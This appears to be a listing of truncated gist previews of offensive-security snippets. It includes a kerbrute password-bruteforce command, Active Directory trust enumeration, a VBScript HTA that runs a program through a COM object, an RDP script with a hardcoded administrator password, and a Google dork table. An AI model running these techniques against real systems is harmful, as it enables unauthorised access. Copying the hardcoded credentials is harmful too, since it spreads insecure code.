binarytrails

# Not secure by any means, just a PoC for XOR'ing data using powershell
# Credit to http://stackoverflow.com/questions/3478954/code-golf-xor-encryption

$enc = [System.Text.Encoding]::UTF8

function xor {
    param($string, $method)
    $xorkey = $enc.GetBytes("secretkey")

    if ($method -eq "decrypt"){

binarytrails

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

binarytrails

Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts 

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()


Grab Forest Trusts.

([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()

binarytrails

#!/usr/bin/env python3
# python3 update of https://gist.github.com/dergachev/7028596
# Create a basic certificate using openssl: 
#     openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# Or to set CN, SAN and/or create a cert signed by your own root CA: https://thegreycorner.com/pentesting_stuff/writeups/selfsignedcert.html

import http.server
import ssl

httpd = http.server.HTTPServer(('127.0.0.1', 443), http.server.SimpleHTTPRequestHandler)

binarytrails

package main

import (
    "bytes"
    "code.google.com/p/go.crypto/openpgp"
    "encoding/base64"
    "io/ioutil"
    "log"
    "os"
)

binarytrails

<script language="VBScript">
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "calc.exe",Null,"C:\Windows\System32",Null,0 
self.close
</script>

binarytrails

#include <stdio.h>
#include <Windows.h>
#include <MSCorEE.h>
#include <MetaHost.h>
#include <evntprov.h>

int main()
{
	ICLRMetaHost* metaHost = NULL;
	IEnumUnknown* runtime = NULL;

binarytrails

#
# Automatically generated file; DO NOT EDIT.
# crosstool-NG 1.25.0 Configuration
#

# This is really dangerous! It allows me to run ct-ng as root from within manjaro-arm-tools.
# Do not do this unless you know exactly what you are doing!!!
# You have been warned. I'm in no way, shape or form, responsible for any damage it may cause if used in ANY other context.
CT_EXPERIMENTAL=y
CT_ALLOW_BUILD_AS_ROOT=y

binarytrails

cmdkey /list | ForEach-Object{if($_ -like "*target=TERMSRV/*"){cmdkey /del:($_ -replace " ","" -replace "Target:","")}}
echo "Connecting to 192.168.1.100"
$Server="192.168.1.100"
$User="Administrator"
$Password="AdminPassword"
cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password
mstsc /v:$Server

binarytrails

Google dork cheatsheet

Search filters

Filter	Description	Example
allintext	Searches for occurrences of all the keywords given.	allintext:"keyword"
intext	Searches for the occurrences of keywords all at once or one at a time.	intext:"keyword"
inurl	Searches for a URL matching one of the keywords.	inurl:"keyword"
allinurl	Searches for a URL matching all the keywords in the query.	allinurl:"keyword"
intitle	Searches for occurrences of keywords in title all or one.	intitle:"keyword"